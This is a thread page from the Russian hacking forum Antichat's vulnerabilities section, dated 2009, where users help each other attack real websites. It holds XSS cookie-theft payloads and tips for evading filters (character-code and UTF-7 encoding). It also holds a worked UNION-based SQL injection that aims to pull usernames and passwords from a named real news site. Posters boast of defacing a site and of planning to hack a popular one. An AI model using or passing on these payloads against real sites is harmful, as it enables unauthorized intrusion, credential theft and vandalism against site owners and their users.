ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8151  
Старый 17.07.2009, 16:50
Аватар для JOHNik
JOHNik
Познающий
Регистрация: 21.04.2009
Сообщений: 58
Провел на форуме:
146521

Репутация: 34
Отправить сообщение для JOHNik с помощью ICQ
По умолчанию

Цитата:
Сообщение от Calcutta  
"><script>alert(document.cookie)</script> получается выполнить.
при подстановке ссылки на сниффер ничего не получается (проверено несколькими людьми), видимо что-то фильтруется.
короч ищи другую xss)
Problema so znakom "="
 
Ответить с цитированием

  #8152  
Старый 17.07.2009, 17:06
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
2. 5 ветка требует закрытых /* коментов (как mssql)
Поправлю:
>= MySQL 5.0.51

До этого можно незакрытые
 
Ответить с цитированием

  #8153  
Старый 17.07.2009, 17:49
Аватар для blase-
blase-
Новичок
Регистрация: 11.07.2009
Сообщений: 4
Провел на форуме:
4330

Репутация: 0
По умолчанию

The_HuliGun, большое спасибо, на другом форуме мне посоветовали использовать group, но этот более проще, спасибо!
п.с. незаходите теперь на тот сайт, там теперь ну просто кошмар!!! веб-вандализм)))
 
Ответить с цитированием

  #8154  
Старый 17.07.2009, 20:58
Аватар для nub-hacker
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Возможно ли провести xss если фильруется <> скобки фигурные. а остальное нет.

Последний раз редактировалось nub-hacker; 17.07.2009 в 21:04..
 
Ответить с цитированием

  #8155  
Старый 17.07.2009, 21:06
Аватар для br3k
br3k
Участник форума
Регистрация: 19.09.2007
Сообщений: 163
Провел на форуме:
2825788

Репутация: 327
Отправить сообщение для br3k с помощью ICQ
По умолчанию

Используй String.fromCharCode()
 
Ответить с цитированием

  #8156  
Старый 17.07.2009, 21:10
Аватар для nub-hacker
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Цитата:
Сообщение от br3k  
Используй String.fromCharCode()
так как я использую эту функцию если я пихаю в поле <script>alert()</script> и в исходниках без <>
вот так scriptalert()/script
 
Ответить с цитированием

  #8157  
Старый 17.07.2009, 21:18
Аватар для br3k
br3k
Участник форума
Регистрация: 19.09.2007
Сообщений: 163
Провел на форуме:
2825788

Репутация: 327
Отправить сообщение для br3k с помощью ICQ
По умолчанию

Тогда используй другую кодировку - UTF-7
символы “<”, “>” заменяются на “+ADw-”, ”+AD4-”
 
Ответить с цитированием

  #8158  
Старый 17.07.2009, 21:21
Аватар для wolmer
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию

нубхакер

http://ha.ckers.org/xss.html там снизу есть Character Encoding Calculator
В поле ASCII Text: вставляешь <script>alert('')</script>
Жмешь encode
Дальше содержимое

Decimal Value:
HTML (without semicolons):

Копируешь и подставляешь там где уязвимый параметр
 
Ответить с цитированием

  #8159  
Старый 17.07.2009, 21:21
Аватар для nub-hacker
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Цитата:
Сообщение от br3k  
Тогда используй другую кодировку - UTF-7
символы “<”, “>” заменяются на “+ADw-”, ”+AD4-”
это сакс, работает токо в ослике. не факт, что у админа осёл. ЗЫ вопрос. в версии phpbb 2.0.xx в куках лежит хэш пасс?


add// нашол нормальную пасивку, всё теперь буду хекать популярный сайт.
 
Ответить с цитированием

  #8160  
Старый 17.07.2009, 22:18
Аватар для 2la.painkiller
2la.painkiller
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944

Репутация: 0
По умолчанию

народ пытался раскрутить не получается взять )
http://www.***.com/news/news.php?id=2983+union+select+1,2,3,4,5,6,7,8,9/*
http://www.***.com/news/news.php?id=2983+union+select+1,table_name,3,4,5,6 ,7,8,9+from+information.schema.tables/*
забираю tables:user
подбираю колонки переведя таблицу в sqlhex - password, user
Пытаюсь добыть инфу
http://www.***/news/news.php?id=2983+union+select+1,concat_ws(0x3a,pas sword,user),3,4,5,6,7,8,9+from+user/*
И выходит пустое место где во всех пред случаях работала sql-inj =((( тоесть страница выходит как надо, но место sql пустое (
Вот
http://www.mtvindia.com/news/news.php?id=-2983+union+select+1,concat_ws%280x3a,password,user %29,3,4,5,6,7,8,9+from+user--

Последний раз редактировалось 2la.painkiller; 17.07.2009 в 22:23..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ